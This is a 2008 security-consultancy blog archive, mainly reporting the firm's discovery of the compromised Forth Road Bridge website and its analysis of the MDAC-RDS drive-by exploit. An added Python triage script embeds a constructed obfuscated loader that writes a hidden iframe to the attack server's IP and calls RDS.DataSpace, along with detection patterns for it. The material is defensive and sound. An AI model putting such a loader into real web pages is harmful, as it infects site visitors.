The Small Business Consultancy

Archive: February 2008

How to Behave on Internet Forums


An informative video via Colin Mackay.

Video: How To Behave On An Internet Forum


Data breaches: No more than normal

Silicon.com is reporting that the ICO reckons government data breaches aren't any worse of late. In other words, they have been losing data, and putting the general public at risk, for some considerable time!

Fair enough, criminals are now using this data more effectively for their nefarious purposes, but it is alarming how far behind the government is when it comes to protecting the public's most valuable assets: their identity and privacy.


Cricket Scotland Website Defaced

Looks like the hackers have been in at the Cricket Scotland website - see image below.

Cricket Scotland website defaced

The Associations Directory webpage has been filled with links of a questionable nature.

Certainly looks like the hackers are going to town with Scottish websites at the moment!


Three Strikes and You’re Offline

The government is currently considering a plan to ban users who are caught illegally downloading copyrighted content. ISPs would have to monitor their customers and ultimately terminate the internet access of anyone found to be infringing copyright.

The BBC reports that “UK net firms are resisting government suggestions that they should do more to monitor what customers do online”.

Now for some Friday humour that complements this story nicely…

Further reading:

BBC Online

Times Online


Computer Security Presentation

On Wednesday evening, James Eaton-Lee of NGS Software and John A Thomson of Roundtrip Solutions presented to the IET South East Scotland Local Network.

The PDF version of the presentation is now available.

Please leave us a comment if you attended the event or have downloaded the presentation and have some comments or questions.


Watch out for XPantivirus

One of our earlier blog posts had Roger Thompson of AVG's Exploit Prevention Labs running through MalwareAlarm in a well-produced video. XPantivirus is a new in-the-wild rogue security program from the same family of malware.

XP Antivirus screen shot

It uses some clever JavaScript, just like MalwareAlarm, to push you down the road of running a fake security scan. In record-breaking time it comes back to announce that the computer has some very scary-looking malware installed, which its product can of course remove for a nominal licence fee. The results are completely bogus: they are faked by design to scare you into handing over your cash, a textbook social engineering scam. No legitimate application would make it this hard to cancel out of installing it!

This one is so new that only 5 of the 32 antivirus engines used by VirusTotal detect it at the time of writing. That means a significant proportion of people are currently running a system that cannot detect this nasty.

Don’t go near the website. Don’t install XPantivirus. Don’t give them payment details. Basically, don’t get caught out folks!

We'll be keeping an eye on how the relevant security vendors respond to this one and will report back, in a follow-up post and video blog entry, on security company response times.

Take care folks.


Fame Roundup

Coverage of the FETA hacking incident is spreading. Here are just some of the places we are being mentioned:

Website of UK landmark hacked to serve malware 
- TechWorld.com

Web site of U.K. landmark hacked to serve malware
- NetworkWorld

That’s Technical: Finjan reports Forth Road Bridge Web site serving up malware using code obfuscation techniques
- That’s Technical Blog

Forth Road Bridge hack redirects to smut bazaar
- Techie News Blog

Finjan reports Forth Road Bridge Web site serving up malware using code obfuscation techniques
- IT Analysis

Forth Road Bridge hack redirects to smut bazaar
- Global Security News

Website of UK landmark hacked to serve malware
- ComputerWorldUK

Website of UK landmark hacked to serve malware: related news
- Big Blog

Taking Guard
- Round the Wicket - The blog of Freuchie Cricket Club

Website of UK Landmark Hacked to Serve Malware
- Hack In The Box

Goodness, this is becoming tedious :-). Go and check Google for yourself to see just how big an issue this is in the online security community!

It would seem a company that makes security appliances which protect against such attacks is jumping on our bandwagon. They have pushed out press releases about this incident, but with a strong focus on their own company and products! We have no problem with that as long as the reports show who really discovered the problem and link back to our discovery blog post in every instance. The title of the That's Technical blog post is misleading at best. Come on guys, you could have made it much clearer in your press release who actually discovered the Forth Road Bridge break-in; and by the way, it was AVG's LinkScanner Pro that was the real hero in terms of the technology involved.


Now the Scotsman

The Scotsman has now picked up The Register's news story about the Forth Road Bridge hacking incident.

Go see it here or catch it on Page 21 of today’s paper.


Four Critical Updates

It has been a busy few days for critical security updates, with four common Windows applications affected. If you're running any of these, download and install the latest version from the vendor pronto:

  1. Adobe Acrobat Reader
  2. Apple QuickTime or Apple iTunes
  3. Sun Microsystems Java
  4. Skype

Apple seems to be pushing out security updates and fixed versions every few weeks, and has been doing so for quite some time now! Who said Apple's software was safer?


"In the Wild" Social Engineering

Roger Thompson of AVG's Exploit Prevention Labs has just produced this excellent video on how social engineering techniques are fooling people, even those who think they are safe because they use Firefox.

The bad guys are getting smarter! Be careful out there folks.


We’ve Made "The Register" Again

John Leyden of The Register, one of the foremost IT news websites on the Internet, has mentioned us in this news story. It was even a featured story at the top of their home page. Thank you John, and thank you The Register.

So far there is no public notice of the incident on the FETA website. Perhaps they are working on a notice to inform their regular users that an incident occurred and that it may have put some of those users' computers at risk from all manner of malware.

This was a serious incident; don't underestimate the impact it may have had on vulnerable computers out there! We only disclosed the incident publicly after the website had been taken down and fixed. We didn't want to highlight the dangers only for curious users to go and "have a look" and end up with even more systems being infected!


A Bridge Too Far is Back

The Forth Road Bridge website is back online and is clean again.

Roger Thompson of AVG has a comprehensive techie write-up of the nature of the exploit and how it worked. We’d recommend you go read his blog entry on this alongside our own earlier blog post. He came to pretty much the same conclusions as we have, which is nice.

It would be really great to get a copy of their forensic investigation tool Web Radar. Perhaps one day they will release it to the general public or maybe allow a select few “security consultants” to be armed with a copy (hint, hint).

Thanks Roger and thanks AVG UK for helping to make today a safer place for the visitors of the FETA website. The folks over at FETA also deserve praise for their prompt actions in taking the website down and getting it back up and running safely in such a short time.

To all our readers, we recommend getting yourself a copy of LinkScanner Pro now! It could save your bacon!


Forth Road Bridge Website Hacked

John A Thomson, MD of Roundtrip Solutions, has just finished investigating a reported issue with the website of the Forth Estuary Transport Authority (FETA), otherwise known as the Forth Road Bridge website. This blog post will make for interesting reading, highlighting the changing nature of the web and how legitimate websites can be compromised to serve nasties to visitors.

Forth Road Bridge - Summer Night
Photo by Martin Third

One of our customers phoned to ask about an adult-themed pop-up that appeared when visiting the Forth Road Bridge website. Unfortunately, we were unable to confirm they had actually visited the website and hadn't mistakenly gone to some porn website in the first place, but what we could confirm was that the FETA website was in an alarming state at the time.

Upon visiting the website, our security software immediately raised an alarm, reporting that the site was serving an MDAC-RDS exploit via the Neosploit hacking toolkit; see the image below for more details.

LinkScanner Pro result for the FETA website

LinkScanner Pro, a product from Exploit Prevention Labs (recently bought by AVG), also reported a problem when it was used to evaluate the Google search result for FETA; see below.

Google result for FETA showing infection

The exact wording used by LinkScanner Pro in its Exploit log was:

NeoSploit

This is an MDAC-RDS exploit, wrapped in an attempted polymorphic script generator.

Yikes! Sounds pretty nasty, doesn’t it? There is more detail here.

Google's cached copy of the page seemed to be unaffected initially, but then Google's crawler came past again and the cache is now also showing the exploited website. The conclusion from all this: the hack took place some time in late January or early February.

The next check was to confirm the domain was indeed owned by FETA by doing a WHOIS lookup. Although the result on its own was inconclusive, enough could be gleaned to say with reasonable certainty that this was the legitimate website. Consilium UK was evidently the supplier involved in delivering the website back in 2003, which explains why they appear as the registrant contact. We do wonder why the registrant details aren't an address somewhere closer to the bridge!

Whois Record

Domain:
        feta.gov.uk
Registered For:
        Forth Estuary Transport Authority
Domain Owner:
        Forth Estuary Transport Authority
Registered By:
        Lumison Ltd
Servers:
        ns0.lumison.net        
        ns.as12703.net        
Registrant Contact:
        Richard Abrams
Registrant Address:
        Consilium UK Ltd
        Mirren Court One
        119 Renfrew Road
        PA3 4ED
        United Kingdom
        +44 1418471545 (Phone)
        +44 8703305882 (FAX)
Entry updated:
        Friday 11th May 2007
Entry created:
        Wednesday 17th September 2003

It was also worth checking who the IP address was assigned to, in case the problem was down to some kind of DNS issue, such as the name resolving to a server that was not FETA's at all.

% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Information related to '87.246.98.144 - 87.246.98.151'

inetnum:        87.246.98.144 - 87.246.98.151
netname:        LU4682
descr:          Internal infrastructure
country:        GB
admin-c:        LUMH-RIPE
tech-c:         LUMN-RIPE
status:         ASSIGNED PA
remarks:        INFRA-AW
mnt-by:         EDNET-RIPE-MNT
changed:        dns@ednet.co.uk 20051111
source:         RIPE

role:           Lumison Hostmaster
address:        Lumison Ltd
address:        12 Dock Place
address:        Edinburgh
address:        EH6 6LU
address:        UNITED KINGDOM
remarks:        trouble:      For customer support please email support@lumison.net
remarks:        trouble:      or call +44 (0)845 1199 999
remarks:        trouble:      For abuse reports please send to abuse@lumison.net
remarks:        trouble:      For peering requests please send to peering@lumison.net
mnt-by:         EDNET-RIPE-MNT
e-mail:         hostmaster@lumison.net
admin-c:        GA8874-RIPE
tech-c:         GA8874-RIPE
nic-hdl:        LUMH-RIPE
changed:        neil.saunders@lumison.net 20040816
changed:        neil.saunders@lumison.net 20040908
source:         RIPE
abuse-mailbox:  abuse@lumison.net

role:           Lumison NOC
address:        Lumison Ltd
address:        7 Claylands Road
address:        Newbridge
address:        EH28 8LF
address:        UNITED KINGDOM
remarks:        trouble: For customer support please email support@lumison.net
remarks:        trouble: or call +44 (0)845 1199 999
remarks:        trouble: For abuse reports please send to abuse@lumison.net
remarks:        trouble: For peering requests please send to peering@lumison.net
mnt-by:         EDNET-RIPE-MNT
admin-c:        GT73-RIPE
admin-c:        GA8874-RIPE
admin-c:        IM1814-RIPE
tech-c:         RM7978-RIPE
tech-c:         GT73-RIPE
tech-c:         IM1814-RIPE
nic-hdl:        LUMN-RIPE
source:         RIPE
abuse-mailbox:  abuse@lumison.net
changed:        ian.mackinnon@lumison.net 20060727
e-mail:         noc@lumison.net

% Information related to '87.246.64.0/18AS12703'

route:          87.246.64.0/18
descr:          Lumison Limited IP allocation.
origin:         AS12703
mnt-by:         EDNET-RIPE-MNT
changed:        dns@ednet.co.uk 20050908
source:         RIPE

Again we had to infer, rather than prove, that this was the FETA website's IP address: the FETA domain points at Lumison's name servers, and Lumison holds the IP address range containing the server the name resolves to. The pieces of the puzzle link up.
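
The ownership cross-check described above, mechanised as an added example rather than anything from the original post: a parser for the RPSL objects a RIPE WHOIS query returns, used to answer the question the investigation asks, namely whether the address the FETA name resolves to sits inside Lumison's inetnum and route objects, and who to send an abuse report to. The record below is a trimmed copy of the one quoted above; the host address 87.246.98.150 is an assumption, since the post shows the range that was queried but not the resolved address itself.

```python
"""Parse RIPE-style RPSL WHOIS output and check an address against it.

Added example (not from the original post). The record is a trimmed
copy of the RIPE objects quoted in the investigation; the host address
87.246.98.150 checked in __main__ is assumed for illustration.
"""
import ipaddress

# Trimmed copy of the inetnum, role and route objects quoted in the post.
SAMPLE_WHOIS = """\
% This is the RIPE Whois query server #3.
% The objects are in RPSL format.

inetnum:        87.246.98.144 - 87.246.98.151
netname:        LU4682
descr:          Internal infrastructure
country:        GB
admin-c:        LUMH-RIPE
tech-c:         LUMN-RIPE
status:         ASSIGNED PA
mnt-by:         EDNET-RIPE-MNT
source:         RIPE

role:           Lumison Hostmaster
address:        Lumison Ltd
nic-hdl:        LUMH-RIPE
abuse-mailbox:  abuse@lumison.net
source:         RIPE

route:          87.246.64.0/18
descr:          Lumison Limited IP allocation.
origin:         AS12703
mnt-by:         EDNET-RIPE-MNT
source:         RIPE
"""


def parse_rpsl(text):
    """Split WHOIS output into objects: a list of lists of (key, value).

    Objects are separated by blank lines and '%' lines are server
    comments. Keys may repeat (several address: or admin-c: lines), so
    each object is an ordered list of pairs rather than a dict.
    """
    objects, current = [], []
    for line in text.splitlines():
        if line.startswith("%"):
            continue
        if not line.strip():
            if current:
                objects.append(current)
                current = []
            continue
        key, _, value = line.partition(":")
        current.append((key.strip(), value.strip()))
    if current:
        objects.append(current)
    return objects


def first(obj, key):
    """Return the first value for key in an RPSL object, or None."""
    return next((v for k, v in obj if k == key), None)


def inetnum_range(value):
    """Turn '87.246.98.144 - 87.246.98.151' into (start, end) addresses."""
    start, end = (ipaddress.ip_address(p.strip()) for p in value.split("-"))
    return start, end


def check_address(addr, whois_text):
    """Find the inetnum and route covering addr and who holds them.

    Returns a dict with the covering inetnum and its netname/maintainer,
    the covering route and origin AS, and the abuse mailbox of the
    inetnum's admin-c role object; None where nothing matched.
    """
    ip = ipaddress.ip_address(addr)
    objs = parse_rpsl(whois_text)
    by_handle = {first(o, "nic-hdl"): o for o in objs if first(o, "nic-hdl")}
    result = {"address": addr, "inetnum": None, "netname": None, "mnt-by": None,
              "route": None, "origin": None, "abuse-mailbox": None}
    for o in objs:
        if first(o, "inetnum"):
            start, end = inetnum_range(first(o, "inetnum"))
            if start <= ip <= end:
                result["inetnum"] = first(o, "inetnum")
                result["netname"] = first(o, "netname")
                result["mnt-by"] = first(o, "mnt-by")
                role = by_handle.get(first(o, "admin-c"))
                if role:
                    result["abuse-mailbox"] = first(role, "abuse-mailbox")
        elif first(o, "route"):
            if ip in ipaddress.ip_network(first(o, "route"), strict=False):
                result["route"] = first(o, "route")
                result["origin"] = first(o, "origin")
    return result


if __name__ == "__main__":
    for k, v in check_address("87.246.98.150", SAMPLE_WHOIS).items():
        print(f"{k:14} {v}")
```

An address that falls inside the route object but outside any inetnum still tells you the provider, just not the specific customer assignment; that is the "surmise" the post describes, and the abuse mailbox is where to send a report when the hosting customer cannot be reached.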

Next it was worth capturing the website's traffic to see where the compromise was occurring. After a little digging the exploit code was found fairly easily: the obfuscated JavaScript stood out like a sore thumb. Very nasty indeed! This code made the browser connect to a server in Turkey at 88.255.90.130. Most of the time that server returned a redirect to the BBC website, but occasionally it delivered a further JavaScript payload, which could have done anything it liked!
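
The first pass of that digging, as an added example that is not code from the original post and not the FETA payload: a triage script that finds the script block that does not belong, peels off one layer of obfuscation, and reports where it sends the browser. The sample page and its encoded payload are constructed here (88.255.90.130 is the address the post names). The RDS.DataSpace check uses the CLSID of the MDAC control that MS06-014 kill-bitted; that CLSID is a known identifier which the page itself does not quote.

```python
"""Triage an HTML page for an injected exploit-kit loader.

Constructed example: not code from the original post, and not the FETA
payload. Indicators raised:
  - a script or iframe src on a bare IP address, and hidden 0x0 iframes
  - eval() or document.write() fed by unescape()/String.fromCharCode()
  - a reference to the RDS.DataSpace ActiveX control, the MDAC component
    that MS06-014 kill-bitted (its CLSID is a known identifier; the post
    does not quote it)
"""
import re
import urllib.parse

RDS_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"

# Constructed payload: what an unescape()-wrapped loader typically decodes to.
PAYLOAD = ('document.write(\'<iframe src="http://88.255.90.130/" width="0" '
           'height="0" style="display:none"></iframe>\');'
           'var o = new ActiveXObject("RDS.DataSpace");')
ENCODED = "".join("%%%02X" % b for b in PAYLOAD.encode())
SAMPLE_HTML = ("<html><head><title>Forth Road Bridge</title></head><body>\n"
               "<script src=\"/media/system/mootools.js\"></script>\n"
               "<p>Bridge open, no restrictions.</p>\n"
               "<script>eval(unescape('" + ENCODED + "'))</script>\n"
               "</body></html>\n")

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
SRC_RE = re.compile(r"<(?:script|iframe)[^>]*\ssrc=[\"']?(https?://[^\"'\s>]+)", re.I)
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe[^>]*(?:width=[\"']?0[\"']?|height=[\"']?0[\"']?|display:\s*none)", re.I)
BARE_IP_RE = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)")
DECODER_RE = re.compile(r"(?:eval|document\.write)\s*\(\s*(?:unescape|String\.fromCharCode)", re.I)
QUOTED_RE = re.compile("'([^']{12,})'|\"([^\"]{12,})\"")
PCT_RE = re.compile(r"(?:%|\\x)[0-9a-fA-F]{2}")
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")


def _charcodes_to_literal(match):
    """Turn String.fromCharCode(82,68,...) into the JS string it builds."""
    text = "".join(chr(int(c)) for c in match.group(1).split(",") if c.strip())
    return '"' + text.replace('"', '\\"') + '"'


def decode_once(script):
    """Undo one layer of the two decoders these loaders lean on:
    String.fromCharCode(...) lists and unescape()-style %XX / \\xXX blobs."""
    out = CHARCODE_RE.sub(_charcodes_to_literal, script)
    for single, double in QUOTED_RE.findall(out):
        blob = single or double
        if len(PCT_RE.findall(blob)) >= 10:   # a long run of escapes: decode it
            out = out.replace(blob, urllib.parse.unquote(blob.replace("\\x", "%")))
    return out


def triage(page, depth=0):
    """Return (indicator, evidence) pairs for a page, recursing into decoded
    script bodies and prefixing what they reveal with 'decoded: '."""
    findings = []
    for src in SRC_RE.findall(page):
        if BARE_IP_RE.match(src):
            findings.append(("bare-ip source", src))
    for tag in HIDDEN_IFRAME_RE.findall(page):
        findings.append(("hidden iframe", tag[:60]))
    if "RDS.DataSpace" in page or RDS_CLSID.lower() in page.lower():
        findings.append(("RDS.DataSpace (MS06-014)", "ActiveX reference"))
    for body in SCRIPT_RE.findall(page):
        if DECODER_RE.search(body):
            findings.append(("eval/write over decoder", body[:60]))
        decoded = decode_once(body)
        if decoded != body and depth < 3:        # bounded: kits nest several layers
            findings.extend(("decoded: " + i, e) for i, e in triage(decoded, depth + 1))
    return findings


if __name__ == "__main__":
    for indicator, evidence in triage(SAMPLE_HTML):
        print(f"{indicator:30} {evidence}")
```

The decoding is static and bounded on purpose: it never executes the script, so a second-stage payload that only the remote server supplies (the "anything it liked" above) is out of reach and has to be fetched and examined separately, ideally from an isolated machine.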

To confirm the problem was indeed a genuine website compromise we referred the incident to Roger Thompson over at AVG. He is the person with all the experience in dealing with exploits detected by LinkScanner Pro; in fact, he got a mention in a 2006 Baseline Magazine article that detailed this very same exploit when it was first being seen in the wild. Expect a blog post from Roger very soon on his findings for this incident. We expect he will have completed the last piece of the puzzle and identified the particular nasties being pushed out by the Turkish server.

Once the compromise had been confirmed we immediately informed FETA IT management. They took the website down within minutes, without waiting for any third-party supplier to confirm the compromise. Kudos to them.

Our guess at this point would be one of the following:

1. A server patch hadn't been applied, allowing the whole server to be compromised. This could be very painful for the web hosting supplier if it turns out to be the case.

2. The website is built using a content management system called Joomla. It may be running an older, insecure Joomla core or an older, insecure extension; perhaps someone forgot or neglected to patch the Joomla files.

3. Something else on the web server has been compromised, allowing access to the FETA website files.

4. One of the website developers has a compromised workstation, allowing the hackers to capture the FTP username and password directly with a key logger.

Only the hackers know the exact nature of the compromise, but the FETA IT team, with a good forensics specialist, should be able to establish how it happened, evaluate the scale of the problem, and then put in place the fixes needed to secure the website better in the future.

People who have visited the website over the last week need only worry if they are running a version of Microsoft Windows that hasn't been patched, or a version older than Windows 2000. Security products may also have caught this nasty and blocked it from gaining a hold. The vulnerability this exploit targets was addressed in Microsoft Security Bulletin MS06-014, released 11 April 2006, along with updates to the affected MDAC versions, so a machine with that update applied is not exposed to it. Customers running Windows Vista are unlikely to have been affected by this exploit.

Our advice to anyone who has visited the FETA website since about 1 February is to run a range of security products (antivirus, antispyware and anti-rootkit tools) over your system to ensure nothing has slipped through. It is also vital to keep up with both Microsoft and third-party application patches and updates.

If you have any doubts or queries then feel free to Contact Us for advice.


Vista Service Pack 1 Released

The Windows Vista blog has just announced the release to manufacturing of Windows Vista Service Pack 1.

This should fix some of the big issues that have seen slow adoption of Vista in the real world. Goodbye to the slowness and reliability problems of Vista! Well, fingers crossed.

Remember to back up your system before applying any major service pack. Alas, you'll have to wait until mid-March before it is available through Microsoft Update.
